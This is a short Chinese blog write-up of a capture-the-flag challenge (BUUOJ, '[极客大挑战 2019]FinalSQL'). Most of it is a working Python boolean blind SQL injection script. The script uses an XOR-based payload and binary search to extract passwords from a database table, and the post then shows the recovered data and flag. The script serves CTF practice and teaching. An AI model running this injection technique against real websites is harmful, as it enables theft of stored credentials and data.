侧边栏

[极客大挑战 2019]FinalSQL

仔细查看它的提示,试一试盲注

import requests
import time
url = 'http://994f19ff-38c7-446e-b200-01d5ce55d8bc.node3.buuoj.cn/search.php'
flag = ''
for i in range(1,250):
   low = 32
   high = 128
   mid = (low+high)//2
   while(low<high):
       #payload = 'http://8c7ac1a3-8ac9-4802-ba55-d0463e4683e6.node3.buuoj.cn/search.php?id=1^(ascii(substr(database(),%d,1))=%d)#' %(i,mid)
       payload = url + "?id=1^(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)" %(i,mid)
       res = requests.get(url=payload)

       if 'ERROR' in res.text:
           low = mid+1
       else:
           high = mid
       mid = (low+high)//2
   if(mid ==32 or mid ==127):
       break
   flag = flag+chr(mid)
   print(flag)
   time.sleep(1)

记得一定要慢点

藏得好深

cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{ddc7e779-690e-4e20-bb90-5cc863fdc71b}
posted @ 2021-07-18 16:14  探针一号  阅读(95)  评论(0编辑  收藏  举报